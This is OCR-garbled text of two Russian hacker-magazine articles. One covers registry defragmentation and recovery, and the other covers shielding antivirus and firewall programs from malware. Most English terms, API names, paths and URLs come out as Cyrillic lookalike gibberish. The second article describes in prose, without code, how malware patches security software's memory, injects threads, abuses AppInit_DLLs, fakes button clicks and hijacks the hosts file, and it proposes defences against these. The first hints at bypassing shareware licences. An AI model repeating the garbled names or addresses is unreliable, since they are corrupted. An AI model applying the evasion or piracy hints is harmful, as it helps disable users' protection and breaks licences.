ЩсЬпеЕ/зузіпЩгпаІз/іпГогтагіоп/бізЫеГгаутепйпу.тзрх . 

Іпзісіе гііе Ке^ізіігу — статья из ѴѴіпбошз N7 Ма^агіпе, подробно опи- 
сывающая структуру, принципы работы и внутреннюю организацию 
системного реестра (на английском языке) : ѵ\лллллтісго50Й.сот/ 
ЕесІтеЕ/агсЫѵе Лл/іпшаз Лірз /ѵѵіпштау /іпге у .т5рх?тіг - Щіе . 
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Зузіепп Рііе Ое^гадтепіег — бесплатный дефрагментатор реестра от Марка 
Руссиновича 
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> ѵѵагпіпд 

Неаккуратные экспе- 
рименты с реестром 
могут привести к 
краху систему. В обя- 
зательном порядке 
надо позаботиться о 
бэкапе. 




Все используемые 
нами утилиты мы, 
естественно, выло- 
жили на диск. Ищи 
их в разделе «Из 
журнала». 



и видим диалоговое окно, перечисляющее заблокированные 
системные файлы (и файлы реестра втом числе) суказанием числа 
занимаемых ими кластеров и количества фрагментов в цепочке. 
Естественно, чем меньше фрагментов, тем лучше, новлюбом 
случае выполнитьдефрагментацию не помешает. 

В графе Ое'РгадтепІаІіоп Сопіхоі взводим радиокнопку 
Оеігадтепі: аі пехі ЬооЕ заставляя дефрагментатор запустить- 
ся при следующей загрузке операционной системы на стадии 
ЬооЫіте (то есть когда стартовал о только ядро и основные 
драйверы) и произвести дефрагментацию всех вышеперечис- 
ленных файлов. Прижелании можно выполнять дефрагмен- 
тацию и при каждой загрузке (радиокнопка Оеігадтеп* еѵегу 
Ьооі). Тут уж каждый решает сам за себя. Мыщъх, зачастую не 
перезагружающий систему по нескольку месяцев кряду, не 
видит между этими двумя пунктами никакой разницы. 
Параметр йе^гад абогі соипібоѵѵп 3 зесопбз позволяет 
задавать промежуток времени, втечение которого дефраг- 
ментацию будет можно отменить нажатием любой клавиши. 
Если мы твердо уверены в своих намерениях и не собираемся 
ничего отменять, можно сбросить этот параметр в ноль, чтобы 
понапрасну не терять драгоценное время. 

Давим на О К и... ничего не происходит?! Спокойно! Без пани- 
ки! Именнотак все и должно быть! Дефрагментатор запустится 
только при следующей загрузке системы, так что идем в меню 
«Пуск», выбираем там соответствующий пункт и терпеливо 
ждем. Впрочем, долго ждать не придется. Привычный процесс 
загрузки прервется чужеродным сообщением дефрагментато- 
ра, сообщающего, сколько и чего было дефрагментировано. 

К сожалению, за один проход Раде йе^гад дефрагментирует 
лишь наиболее фрагментированные файлы, да и то не до кон- 
ца, а потому для достижения максимальной производительно- 
сти эту процедуру следует повторять несколько раз, добиваясь, 
чтобы все файлы реестра располагались в одном фрагменте. 
При этом, возможно, придется предварительно расчистить 
дисковое пространство, выкидывая оттуда все лишнее. По 
спецификациям на КІТЕБ-драйвер, для нормальной работы 
дефрагментатора должно быть свободно по меньшей мере 13% 
дискового пространства, а лучше — от20%-30% и выше. Ко- 
нечно, это довольно суровые цифры, особенно для владельцев 
небольших дисков, забитых до отказа, но, увы, такова жизнь. 

На этой возвышенной ноте будем считать, что с внешней дефраг- 
ментацией реестра покончено, и пора браться за внутреннюю. 

0 КАК БЫТЬ С ВНУТРЕННЕЙ ДЕФРАГМЕНТАЦИЕЙ 

Прежде чем приводить внутренние структуры реестра в пол- 
ный порядок, крайне желательно запустить Пед Сіеапегили 



любую другую утилиту подобного типа, удаляющую неисполь- 
зуемые ветви и прочий поганый мусор. Сама по себе чистка 
не сжимает реестр и неувеличивает производительности 
(поскольку на месте удаленных ветвей остаются дыры), однако 
в совокупности с дефрагментацией она дает впечатляющий 
результат. 

Также рекомендуется проверить реестр на предмет различных 
ошибок, чем занимается целый легион утилит, втом числе 
и условно-бесплатная АбѵапсесІ Педізігу Оріітігег/Педізігу 
Сіеапеготуже упомянутой компании Зузіѵѵеак ( ѵѵѵѵѵѵ.зѵзіѵѵеак. 
со т/а го) , бесплатно-демонстрационная версия которой обна- 
ружила на мыщъхином компьютере свышетрехтысяч ошибок, 
но согласилась пофиксить только 20 из них, а за исправление 
остальных надо платить (или хачить). 

Помимо прочих полезных инструментов для работы с реест- 
ром, АбѵапсесІ Педівігу Орііппігег включает в себя и внутренний 
дефрагментатор. Быстрый, но не самый лучший. Ктомуже не 
выдающих никаких внятных отчетов. Тут лучше воспользо- 
ваться условно-бесплатной утилитой Педізігу БеІгадтепШіоп 
( ѵѵѵѵѵѵ.еісог.пеі/гбеітад.ріір ) от компании Еісог, поддержива- 
ющей все операционные системы от95-й Винды до Висты 
включительно. Благодать длится 21 день, после чего комму- 
низм заканчивается, и дальше приходится действовать по 
обстоятельствам. Кстати, это одна из немногих известных мне 
утилит, умеющая дефрагментировать ветвь Беси гііу, правда, не 
без выдачи предупреждения, что в процессе дефрагментации 
может возникнуть косяк и система рухнет. Впрочем, у меня так 
и не рухнула, сколько бы я над ней не издевался. 

Программа нетолько приводит реестр в порядок, нотакже 
выдаетсимпатичный отчет, убедительно показывающий, 
чем мы ей обязаны (может быть, и вправду стоит за платить?!). 
Ксожалению, сильно фрагментированного реестра мыщъх 
таки не нашел, а потому приведенный результат к категории 
впечатляющих и срывающих крышу явно не принадлежит. Но 
стоит поработать с компьютером несколько месяцев, как левое 
окно (состояние реестра до дефрагментации) будет буквально 
усеяно красными квадратиками, изображающими фрагменти- 
рованныеузлы! 

Другая полезная утилита этого класса — ПедСотрасі Рго от 
компании ЕхрегітепіаІБсепе ( ѵѵѵѵѵѵ.ехрегітепіаізсепе.сот ). 
Демонстрационная версия работаеттолько 7 дней. Ветвь 
Бесигку и выдача отчета о проделанной работе поддержива- 
ются, однако наглядность отчета далеко не на высоте. Кстати, 
в работе с программой есть одна хитрость — при первом же 
запуске она ломанется в интернет, требуя прямого соединения 
с сетью (или ргоху) и передавая регистрационные данные, 
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Поданным компании Бузіѵѵеа к, быстродействие компьютера (за счет 
фрагментации реестра) в среднем падает на 50% за полгода эксплуатации 
(ѵѵѵѵѵѵ.вувіѵѵеак.сопп/а го) 



ВЕТВЬ РЕЕСТРА (НІѴЕ) 


ДИСЛОКАЦИЯ НА ДИСКЕ 


НКЕѴ_СиККЕМТ_С0МРІ6 


БУЗТЕМ, 5у5тем.аі_т, 5Ѵ5ТЕМ.І_0е, 
БУЗТЕМ.ВАѴ 


НКЕѴ_СиККЕМТ_и5ЕК 


МТІІВЕР.ОАТ, МТЦЗЕК.ОАТ.І-Ое 


НКЕѴ_І.0САІ._МАСНШЕ\5АМ 


5ам, Бдм.і-ое, Бам.ваѵ 


НКЕѴ_І.0САІ._МАСНШЕ\5Есикітѵ 


Бесіжіту, БЕСцкітушое, Бесошту.ваѵ 


НКЕѴ_І.ОСАІ._МАСНШЕ\5оггѵѵаке 


БОРТѴѴАКЕ, БОРТѴУАРЕ.ЬОе, Бортѵуаре.заѵ 


Н КЕѴ_І_0 САІ__М АС Н 1 N Е\5ѵзтем 


Бувтем, 5увтем.аі-т, 5У5ТЕМ.І-0е, 
Бувтем.ваѵ 


НКЕѴ_ІІ5ЕР5\.0ЕРАШ_Т 


ОеРАІЛ-Т, РеРАШ-Т.І-ОО, 0ЕРАІЛ.Т.5АѴ 



которые еще заполнить надо! А нам вл ом! И вообще, право на тайну личной 
жизни никто не отменял, вот мы и жмем на Сапсеі, но вместо ожидаемого 
отказа работать... вдруг попадаем в основное окно программы! Оказывает- 
ся, что интернетей нетакуж и сильно нужен. Достаточно нажать Асбѵаіе и 
ввести серийный номер (полученный известным путем), и хотя мы останем- 
ся незарегистрированными пользователями (то есть без поддержки), нам, 
хакерам, кэтому не привыкать! 

Н РЕЕСТР В РУИНАХ 

Дефрагментация реестра (особенно внутренняя) — довольно рискованная 
операция. Послетакого мероприятия можно и не загрузиться, а это уже 
сплошной ахтунг! Вообще-то, в состав АбѵапсесІ Редізігу Орбппігеги Педівіху 
йеітадппепіюбоп входят утилиты резервирования реестра (Педівіху Васки р) 
для его последующего восстановления, если что-то пошло нетак. Аналогич- 
ной функциональностью обладает и штатный МісговоІТ Васкир. Однако все 
это ѲІІІ-приложения, нуждающиеся в графическом интерфейсе. Если же 
система падет еще на ранних стадиях загрузки, весь этотзоопарк отдыхает. 
Конечно, можно просто переустановитьѴѴІпсіоѵѵвснуля, но... вопрос даже не в 
том, сколько времени это займет. Если использовались атрибуты шифрования 
для файлов (поддержка которых появилась начиная с ѴѴ2К), то после переус- 
тановки они окажутся недоступны, даже если мы создадим учетные записи с 
идентичными именами и паролями. Авсе потому, чтохитрая Місговоіі генери- 
рует для каждого пользователя специальный ключ, хранящийся в реестре и 
погибающий вместе с ним. Такчто переустановка ничего не решает. 

Мыщъху известно два выхода из этой ситуации (отказ от дефрагментации 
не предлагать). Первое — установить «теневое» зеркал о диска с помощью 
утилит от Ыогіоп'а или Асгопісв’а, что скушает довольно многодискового 
пространства, но... зато в любой моменту нас будет возможность выполнить 
откат, восстанавливая исходный реестр из дымящихся руин вместе со 
всеми файлами, которые мы успели изменить за это время, что, согласись, 
не есть хорошо и вообще полный бэд. 

Вариант намберту: перед дефрагментацией заходим в систему с правами 
администратора (внимание! незапускаем ЕАНс правами администратора 
из-под обычного пользователя! нам нужен чистый администратор). Захо- 
дим вдиректорию ОоситепізапсІ БеШпдв и копируем оттуда всефайлы 
піивег.сіаі (хранящие НКЕУ_СІІННЕІ\ІТ_ІІ5ЕН) в какое-нибудь надежное 
место, например на 21 Р или СО/ОѴО-НѴѴ, естественно, не забывая, какой 
піивег.сіаі; какому пользователю принадлежит. Скопировать піизег.сіаі са- 
мого администратора не получится, поскольку он заблокирован системой. 
Ничего не поделаешь! Приходится заводить еще одного пользователя из 
группы администраторов, логниться под его именем и копировать піивег. 
сіаі настоящего администратора. 

Теперь (не выходя из администратора) запускаем МісговоІІ: Васкир, набирая 
в командной строке піЬаскир.ехе. Далее во вкладке «Архивация» взводим 
галочку напротив пункта «Состояние системы» и, указав путь кархиву, на- 
жимаем на кнопку «Архивировать». Архив (занимающий порядка четверти 



гигабайта) также следует перебросить на 2ІР или другой носитель по вкусу. 
ОК. Теперь, когда наша задница капитально прикрыта от всякихтам напас- 
тей, выполняем дефрагментацию реестра и в случае неуспеха приступаем 
к восстановительным работам. Снимаем с компьютера системный диск и 
подключаем его вторым ксистеме сживой ЫТ/ѴѴ2К/ХР/Вистой (впрочем, 
насчет Висты я неуверен). Вставляем 2ІР/СО/ОѴО в привод и копируем все 
файлы піивег.сіаітуда, откуда они были взяты на сохранение. 

Следующая фаза операции: запускаем (на здоровой машине) ее собствен- 
ный МісговоІТ Васкир, переходим ко вкладке «Восстановление» и подсовы- 
ваем архивный файл, созданный перед крахом нашей основной системы. 
Теперь внимание на экран! В графе «Восстанавливать файлы в:» выбираем 
пун кт «Альтернативное размещение», а строкой ниже указываем путь к 
этому самому альтернативному размещению (например, С:\ТЕМР\11праск) 
и после нажатия на кнопку «Восстановить» МісговоІТ Васкир распакует 
архив, поместив все файлы в С:\ТЕМР\11праск\Реестр, откуда мы копируем 
их в катал ог\ѴѴІ N МТ\зуз1:ет32\соп1 : ід\ порушенной машины. 

Вот, собственно, и все. Отдираем диск и прикручиваем его обратно. Загружа- 
емся. Если все было сделано правильно, система стартует нормально и ни- 
каких следов разрушений не наблюдается. Такчто можно продолжать экспе- 
рименты с дефрагментацией реестра и дальше. Естественно, всякий новый 
дефрагментатор лучше всего предварительно опробовать на виртуальной 
машине, чтобы потом нетрахаться с восстановлением основной системы. 

В КРИС РЕКОМЕНДУЕТ! 

Выигрыш от дефрагментации реестра в значительной мере определяется 
количеством имеющейся оперативной памяти (если памяти много, туда 
можно загрузить даже сильно фрагментированный реестр практически без 
ущерба для производительности). К тому же если на компьютере работают, а 
не играются в добавление/удаление новых программ, то реестр фрагменти- 
руется крайне медленно, и стакой системой можно проработать не один год 
без каких бы то ни было проблем. 

К сожалей ию, установка заплаток безопасности фрагментирует реестр 
(иногда весьма значительно), и потому совсем без дефрагментаторов 
никому не обойтись. Косвенно оценить разницу до и после дефрагментации 
можно с помощью штатного диспетчера задач (вызываемого комбинацией 
клавиш <Аи-5Ьі^-Езс>), замеряя количество потребляемой памяти сразу 
же послезагрузки системы. После дефрагментации сильно фрагмен- 
тированного реестра оно зачастую сокращается на несколько десятков 
мегабайт. Ну и плюс скорость загрузки. 

С другой стороны, чрезмерноеувлечениедефрагментаторами ни кчемуне 
ведет, и эту операцию следует выполнять приблизительно раз в сезон, а если за 
минувшее время никаких новых программ не устанавливалось, то и реже. Одна- 
ко следует помнить, что некоторые программы довольно интенсивно работа юте 
реестром, создавая и удаляя большое количество ветвей в ходе их нормальной 
эксплуатации. Такчто универсальных рецептов здесь нет, и оптимальный пери- 
од дефрагментации лучше всего подбирать экспериментально, т 
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КАК ЗАЩИТИТЬ СВОИ ФАЙРВОЛ И АНТИВИРУС 



ОТ НАБЕГА МАЛВАРИ 



Очень часто антивирусы и брандмауэры 
превращаются из охотников в жертвы. 

В борьбе с активной малварью еще и не 
такое случается. И хотя разработчики 
всячески пытаются защититься от пося- 
гательств со стороны зловредного кода, 
воздвигая целый комплекс средств про- 
тивовоздушной обороны, при схватке с 



грамотно спроектированным зловред- 
ным кодом они обречены на поражение. 
Как усилить защиту уже существующих 
антивирусов/брандмауэров, не вмеши- 
ваясь в их машинный код и не ковыряя 
исходные тексты, которых у нас все рав- 
но нет? Реально ли это вообще? Еще бы! 




ужская часть населения еще помнит те давние время, когда 
антивирус (вместе со всеми базами и самой М5-005) уме- 
щался на одной «стерильной» дискетке с защитой от за пи си, 
откуда его настоятельно рекомендовалось запускать. Запуск 
антивируса из-под зараженной операционной системы часто приводил к 
ложным негативным срабатываниям. То есть антивирус не находил даже 
известные ему вирусы, а все потому, что зловредный код слишком хорошо 
знал антивирус и модифицировал его код, отвечающий за распознава- 
ние заразы. 

Современные антивирусы на дискету уже не влезают и вынуждены сра- 
жаться с активной малварью, в арсенале которой помимо многочислен- 
ных маскировочных методов имеется и оружие возмездия. Аналогичным 



образом дела обстоят и с персональными брандмауэрами. Ихтяжело 
пробить снаружи (то есть с удаленной машины), но легко отключить 
локально, внедрившись в адресное пространство брандмауэра или 
поигравшись с элементами управления путем эмуляции клавиатурного/ 
мышиного ввода (атаки типа ѴѴМ_). 

Конечно, разработчики всячески защищаются от нападоксо стороны 
вредоносного кода (например, путем проверки целостности собственно- 
го тела). Однако получается ун их неочень хорошо, и вообще создается 
впечатление, что они в первую очередь озабочены качеством детекции и 
количеством распознаваемых вирусов, то есть предпочитают нападать, а 
не обороняться. Воттолько, вырвавшись вперед, они рискуют оказаться 
в плотном кольце окружения. «Независимые» обзоры также не уделяют 
защите никакого внимания, тестируя антивирусы/брандмауэры в лабора- 
торных условиях. 

Проактивные технологии, проверяющие все открываемые файлы на 
лету, действительно имеют хорошие шансы остановить ра с простран е- 
ниезаразы, поскольку мал варь уничтожается ещедотого, какполучит 
управление. А вот автономные сканеры, запускаемые раз в несколько 
дней (а то и недель), намного более уязвимы и, как показывает прак- 
тика, очень плохо справляются с поиском руткитов. А если вспомнить, 
что зловредный код часто распространяется через дыры в безопасно- 
сти (антивирусами не контролируемые), их судьба становится совсем 
незавидной. 

Статья построена на основе анализа большого количества малвари. 
Мыщъх исследовал наиболее популярные техники противодействия 
антивирусам/брандмауэрам и разработал простые и эффективные 
«бронежилеты», пригодные для защиты уже существующих программ без 
какой бы то ни было их переделки. Поэтому не волнуйся: дизассемблер 
тебе не понадобится! 
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Ручной анализ кода антивируса, препятствующего его работе под Фемидой Фемида на страже порядке 



Н СТРАТЕГИЧЕСКИЕ РАКЕТЫ 
МЕЖПРОЦЕССОРНОГО НАЗНАЧЕНИЯ 

Как работает малварь? Какие приемы используются для ослепления 
защитных механизмов? Возможных способов очень много, и каждый 
день появляются все новые и новые. Чтобы навести в этом хаосе хотя 
бы какое-то подобие порядка, необходимо классифицировать основные 
методы, а также их производные. Тогда станет понятно, от кого и как нам 
обороняться. 

Порядка 80% зловредных программ открывают процесс-жертву 
АРІ -функцией ОрепРгосевв, получая (в случае успешного за верше- 
ния операции) дескриптор процесса, передаваемый АРІ -функции 
РеасІРгосевзМетогу. Последняя читает содержимое памяти процесса- 
жертвы и копирует его во внутренний буфер малвари, которая путем 
сигнатурного поиска пытается отловить все известные ей защитные 
программы (список активных процессов можно получить средствами 
ТООІ_НЕІ_Р32). Если подобная программа обнаруживается, малварь 
смотрит в свою базу сигнатур, извлекая смещение машинных команд, 
которые надлежит нейтрализовать, что осуществляется путем переза- 
писи памяти жертвы АРІ-функцией ѴѴгЛеРгосеввМетогу. В большин- 
стве случаев достаточно заменить пару условных переходов, навсегда 
отучив антивирус/брандмауэр ругаться грязными словами. 

В более сложных случаях малварь впрыскивает внутрь защитной 
программы свой код, ведущий партизанскую войну с защитным ме- 
ханизмом с учетом конкретных ситуаций, что намного более пред- 
почтительно, поскольку новые версии антивирусов/брандмауэров 
выходят достаточно часто и создателю малвари приходится постоянно 
обновлять базу сигнатур. С закрытых позиций (то есть из соседнего 
процесса) нанести прицельный удар не так-то просто! Ошибка водин- 
единственный байт может привести к зависанию, что не есть хорошо. 
Напротив, оказавшись внутри антивируса/брандмауэра, хакерский код 
без проблем обезвредит все «детонаторы» вполне универсальным пу- 
тем: например, установит еще один перехватчик открываемых файлов 
поверх установленного антивирусом, а перед передачей управления 
последнему сотрет в проверяемом файле все следы своего присутствия 
(естественно, сотреттолько в памяти). 

Внедрение в посторонние процессы осуществляется различными 
путями. Классический способ (работающий только в ЫТ- подоб- 
ных системах) — создать удаленный поток вызовом АРІ -функции 
СгеаіеРеппоіеТИгеаб или ЫаЕѵеАРІ-функции ЫіСгеаіеТИгеасІ, 
однако перед этим необходимо забросить зловредный код внутрь 
атакуемого процесса. И тут хакеру на помощь приходят АРІ -функ- 
ции: АІІосаіеѴігіиаІМетогу (для выделения блока памяти) или 
ОиегуѴИиаІМегпогу (для поиска уже выделенного блока, пригодного 



для внедрения) с последующим вызовом ѴѴгііеРгосеввМетогу. 
Внедрение в стиле модерн апеллирует к манипуляциям с процессорным 
контекстом. Новые потоки при этом не создаются. Внутрь процесса- 
жертвы записывается зловредный код (и тут без ѴѴгіІеРгосеввМетогу 
никак не обойтись!), а затем АРІ -функция ми беіТЬгеабСопіехѴ 
ЗеіТЬгеабСопіехі регистр-указатель команд перемещается на начало 
зловредного кода, длина которого обычно составляет несколько де- 
сятков байт — вполне достаточно, чтобы загрузить свою динамическую 
библиотеку или «отрыть портал». Но это уже детали реализации. 
Некоторые (между прочим, достаточно многие) антивирусы/брандмау- 
эры перехватывают вызовы ѴѴгіІеРгосеввМеггюгу/ЗеіТЬгеасІСопІехі и 
поднимаюттревогу, если запись происходит в секцию кода. Однако этот 
перехват достаточно легко обойти: например, вызывать АРІ -функции 
не с первого байта, эмулируя выполнение пропущенных команд; или же 
внедряться в область данных. Правда, при активном аппаратном йЕР 
попытка внедрения в область данных ведет к исключению, завершаю- 
щему работу атакуемого приложения в аварийном режиме. 

Обойти контрольза ЗеіТЬгеабСопіехі можно путем подключения 
псевдоотладчика (созданного малварью) к процессу-жертве АРІ-функ- 
цией ОеЬидАсбѵеРгосевв, за которой не следит ни один известный мне 
защитный механизм; и хакер может преспокойно получать контекст 
потока в свое распоряжение через генерацию отладочных событий. 
Такой способ внедрения в антивирусы/брандмауэры встречается все 
чаще и чаще. 

Примерно 10% зловредных программ лезут в следующую ветку систем- 
ного реестра НКЕМ\5оіТѵѵаге\Місго5о!ЛѴѴіпсІоѵѵ5 ЫТ\СиггепіѴег5Іоп\ 

ѴѴі п сі оѵѵз\Ар р I п І1;_0 ббз , добавляя туда свою динамическую библиотеку, 
которую операционная система будет проецировать на адресное про- 
странство всех 6111-приложений, передавая ей бразды правления до их 
запуска. Практически все современные защитные комплексы следят 
за Арр I п П:_0 ббз и начинаютжутко материться, если там обнаруживает- 
ся новая ОЕб. Однако, если малварь хакнула Арр I п І1;_0 ббз до запуска 
антивируса/брандмауэра, им остается только утереться, поскольку кто 
первый получает управление, тот царь и король. 

Еще приблизительно 1 0% зловредных программ борются с защитами 
через оконный интерфейс. Что можетбыть проще! Находим окно по 
его заголовку (АРІ-функции ЕіпбѴѴІпсІоѵѵ ил и Еп и тѴѴі псіоѵѵз) , добира- 
емся до элементов интерфейсного управления и начинаем хачить их 
по своему усмотрению. Зловредный код может подавить появление 
нежелательных окон (например, сделав их невидимыми — АРІ -функция 
ЗЬоѵѵѴѴІпбоѵѵ), найти кнопку с надписью «Уев» и «надавить» на нее путем 
посылки соответствующих ѴѴІпбоѵѵв-сообщений. Или же заблокировать 
все кнопки (АРІ-функция ѴѴІпбоѵѵОіваЫе). Наконец, можно забраться в 
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Используй описан- 
ные методы на свой 
страх и риск. Учти, 
что в случае неуме- 
лого использования 
и в некоторых других 
конкретных случаях 
можно неувеличить 
защиту, а, скорее, 
навредить. 




Все, что нужно для 
защиты файрвола и 
антивируса, ты най- 
дешь на ОѴО-при- 
ложении к журналу. 



настройки и отключить защиту, а чтобы пользователь ни- 
чего не заметил, каждый раз подсовывать ему поддельный 
экран. И это не фантастика! Такие вирусы уже есть, причем 
совсем не один, а написать их может даже школьник, едва 
осиливший ОеІрЬІ и пролиставший по диагонали ЗйК. 
Другой излюбленный объект атаки — файл \ѴѴ I N N Т\ 
5у5{ет32\0гіѵег5\еІс\Но5{5, позволяющий сопоставлять ІР- 
адреса сдоменными именами и имеющий приоритетнад 
БЫЗ-сервером. То есть если малварь не хочет, чтобы анти- 
вирус обновлялся, то она просто добавляет в Иовіз-файл 
одну строчку, перенаправляя запросы к серверу обновле- 
ний куда-нибудь еще, например на локальный узел жертвы 
(которому соответствует адрес 1 27.0.0.1 ) или, что еще хуже, 
на сервер самого создателя малвари, распространяющий 
вредоносные обновления, которые содержат не только 
сигнатуры, но и машинный код. И хотя антивирусные базы 
в большинстве своем защищены цифровыми подписями и 
другими криптографическими средствами, при большом 
желании со стороны хакера их можно обойти. 

Впрочем, пора уже разобрать несколько эффективных 
приемов защиты от всего этого безобразия. 

Н СПОСОБ 1. ИСПОЛЬЗУЕМ «БРОНЕЖИЛЕТ» 

Малварь нужно бить еще на излете. Самое простое, что 
можно только сделать, — это упаковать антивирус/бранд- 
мауэр достойным протектором, препятствующим сигнатур- 
ному поиску и внедрению в охраняемый процесс посторон- 
него кода. Крутых протекторов сейчас как никогда много, 
взять хотя бы туже ТЬетісГу (которая в просторечии завется 
Фемидой). Правда, на официальном сайте ( ѵѵѵѵѵѵ.огеапз. 
сот ) л ежит только демонстрационная версия... 

Чем хороша Фемида? А тем, что перехватывает и блоки- 
рует следующие АРІ-функции: ЫШІосаІеѴіііиаІМетогу, 
№СгеаіеТЬгеасІ, ЫШиегуѴігІиаІМетогу, 
ЫіРеасІѴІгІиаІМетогу, ЕѵѵТегтіпаіеРгосезз, 
ЫіѴѴгііеѴігіиаІМетогу. Префикс N1 означает, что мы имеем 
дело с ЫабѵеАРІ-функциями, самыми низкоуровневыми 
системными функциями, доступными на прикладном уровне, 
что одним махом срубает до примерно 80% всей малвари. 
Конечно, если малварь работает на уровне ядра, то это 
другое дело, но и в этом случае ей придется изрядно на- 
прячься, посколькутелоупакованного файла зашифровано 



и расшифровывается динамически по ходу его исполнения, 
тут же зашифровываясь вновь. 

Без функции №РеасІѴІг1:иаІМетогу малварь обломается с 
чтением содержимого защищенного процесса, а значит, 
не сможет отличить антивирус/брандмауэр от осталь- 
ных программ. Запрет на создание удаленных потоков 
ЫагіѵеАРІ-функцией ЖСгеаІеТЬгеасІ не позволит внед- 
риться в адресное пространство жертвы, тем более что 
ЫіѴѴгіІеѴігІиаІМетогу все равно не работает. Ну и как 
бедная малварь должна копировать зловредный код? 
Аналогичным образом обстоят дела и с другими атаками. 
Обработанный Фемидой файл практически неуязвим. За- 
частую настолько неуязвим, что вообще неработоспособен. 
Фемида не самый корректный упаковщик, и простейший 
контроль целостности, выполняемый антивирусом/бранд- 
мауэром, тутже показывает, что с файлом что-то нето. 

Как следствие, антивирус/брандмауэр выдает на экран 
предупреждающее сообщение или вообще отказывается 
работать. В такой ситуации нам остается либо взять в лапы 
Ьіеѵѵ и вырезать из антивируса/брандмауэра систему са- 
моконтроля, которая нам только мешает, либо же, поиграв- 
шись с настройками протектора, выбрать компромиссный 
вариант, который и от малвари защищает и ругательств со 
стороны защиты не вызывает. 

В СПОСОБ 2. ЗОВЕМ НА ПОМОЩЬ ОТЛАДЧИК 

Если примирить защиту с протектором никак не получа- 
ется, имеет смысл обратиться за помощью к отладчику, 
например к бесплатно распространяемому ОНуйсІЬ ( ѵѵѵѵѵѵ. 
оІІѵсІЬд.сІе ). Просто загружаем защищаемую программу в 
Ольку (или прицепляется куже запущенному процессу: 

«Рііе АЛасЬ») и нажимаем <Р9> (Рип) для нормального 
продолжения выполнения программы без трассировки. 

Что это дает? Во-первых, поскольку отладка в ѴѴІпсіоѵѵб 
нереентабельна, то процесс, находящийся под покрови- 
тельством Ольки, не может отлаживать никто другой, и 
попытки малвари зацепиться за него ни к чему не приведут. 
Также Олька позволяет отслеживать появление новых по- 
токов (как локальных, так и удаленных). Достаточно в меню 
«Орііопз БеЬиддтд Орііопз» взвести галочку «Вгеак 
оп пеѵѵібгеасі» во вкладке ЕѵеГіТ, Тогда отладчик будет 
останавливаться всякий раз при создании нового потока. 



► ОЗО 
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Защита кодовой секции от чтения с помощью ОІІуБеЬиддег 



Сивіотівегза работой 



И хотя антивирусы/брандмауэры активно создают свои собственные 
потоки в целях производственной необходимости (что очень надоеда- 
ет), все-таки такая защита лучше, чем совсем никакой. 

Аесли еще взвести и галочку «Вгеак оп пеѵѵ тобиіе» (ОН), то отладчик 
будет останавливаться при загрузке всякой динамической библио- 
теки. И хотя опять-таки антивирусы/брандмауэры могут подгружать 
библиотеки по ходу дела, обычно это происходит в строго определенных 
ситуациях при совершении пользователем тем или иных действий. 
Беспричинная загрузка БІ_І_ с вероятностью, близкой к единице, свиде- 
тел ьствует об ата ке ! 

г СПОСОБ 3. ИСПОЛЬЗУЕМ БИТЫ ЫХ/ХР 

Наконец, высший пилотаж — защита кодовых секций от внедрения. 
Работаеттолько на процессорах с поддержкой битов ЫХ/ХБ (то есть на 
достаточно современных процессорах) и с ХР 5Р2 с задействованным 
аппаратным Б ЕР для всех приложений (поумолчаниюБЕР распростра- 
няется только на системные компоненты). 

В отладчике нажимаем <АЕТ-М>, чтобы увидеть карту адресного про- 
странства. Находим там модуль, имя которого совпадает с именем анти- 
вирусного процесса; видим секцию .іехі (реже СОВЕ), щелкаем правой 
клавишей мыши, в контекстом меню выбираем пункт «5еі Ассезв -> 
Ехесиіе» — и все! С этого момента любая попытка чтения секции кода 
приведет к исключению, отлавливаемому отладчиком и блокирующему 
атаку. Напоминаю, что этот трюк действует только при соответствующей 
поддержке со стороны операционной системы и процессора (за подроб- 
ностями отсылаю к своей статье: ЬирѴ/пегиті.огд.ги/гд-пх.ііпсепзогесІ. 
2 Ір . где все это описано). Правда, если антивирус/брандмауэр попы- 
тается подсчитать контрольную сумму кодовой секции для проверки 
собственной целостности, то его встретитжестокий облом. Впрочем, мы 
можем нажать <Б9> для продолжения выполнения кода или на время 
снять запрет на чтение кодовой секции, только это все равно не спасет 
от мал вари, модифицирующей стек или секцию данных. Но, к счастью, 
умной мал вар и в живой природе практически не встречается, и все 
больше приходится бороться со студенческими поделками. 

Другая возможная проблема — антивирус/брандмауэр может не 
захотеть запускаться из-под отладчика, например, потому что доверху 
нашпигован различными антиотладочными приемами. Ну и что нам 
делать?! 

Н СПОСОБ 4. НАСТРАИВАЕМ ПРАВА ДОСТУПА 

Хорошая идея — запустить антивирус/брандмауэр от имени админист- 
ратора, а самим работать в пользовательской сессии. Тогда малварь, 



обладающая пользовательскими правами, просто не сможет открыть 
процесс защищенного приложения. Запуск программ от имени другого 
пользователя (в данном случае администратора) осуществляется штат- 
ной командой гипаз с ключами /ргобіе и /епѵ, копирующими профиль и 
среду текущего пользователя. Без этих ключей антивирус/брандмауэр, 
не найдя своих настроек, может просто не запуститься! 

Запуск приложений от имени администратора — достаточно на- 
дежное средство защиты от посягательств на адресное простран- 
ство защищаемого процесса со стороны малвари, но! Эмуляция 
клавиатурного/мышиного ввода продолжает работать, что не 
есть хорошо. Как этому противостоять?! Увы, ответ обескуражи- 
вающий. Даже со всеми нововведениями ѴѴІпсІоѵѵз Ѵізіа — никак. 
Единственная зацепка — заголовок окна. Большинство зловред- 
ных программ именно так и «палит» антивирусы/брандмауэры. 

Ну, изменить заголовок не проблема. Это умеет делать любой 
продвинутый твикер, например старый-добрый Сизіотізег. Он же 
умеет двигать элементы управления (например, кнопки), изменяя 
их размеры. Зачем это нужно?! А затем, что более продвинутая 
малварь не смотрит на заголовок главного окна, а сечет раскладку 
дочерних элементов управления, поскольку положение и размеры 
элементов управления уникальны для каждого приложения, и их 
(в целях маскировки) рекомендуется слегка изменять. Сизіотігег 
(как и большинстводругихтвикеров подобного типа) позволяет 
сохранять профили изменений, автоматически восстанавливая их 
при каждом запуске и освобождая нас от необходимости делать эту 
рутинную работу вновь и вновь. 

Н СПОСОБ 5. ЗАЩИЩАЕМ Н05Т5-ФАЙЛ 

Следи также за файлом \\А/ІММТ\5у5Іет32\Бгіѵегз\еІс\Ьо5І5, удаляя 
посторонние записи. В принципе ничего не мешает грохнуть и сам 
файл Ьозіз, поскольку очень мало пользователей использует его по 
назначению. 

Следуя обозначенным рецептам защиты, мы намного увеличим 
безопасность своего компьютера, нанося малвари сокрушающий 
ответный удар. Но в мире нет и не может быть защиты, которую нельзя 
обойти. Поместив антивирус/брандмауэр в «бронежилет», мы всего 
лишь уменьшаем вероятность прямых попаданий, отсекая большое 
количество «шрапнели», пущенной пионерами. Приемы, предлагаемые 
нами, не претендуют ни на универсальность, ни на полноту. Однако они 
нетребуют никакой квалификации и доступны каждому пользователю. 

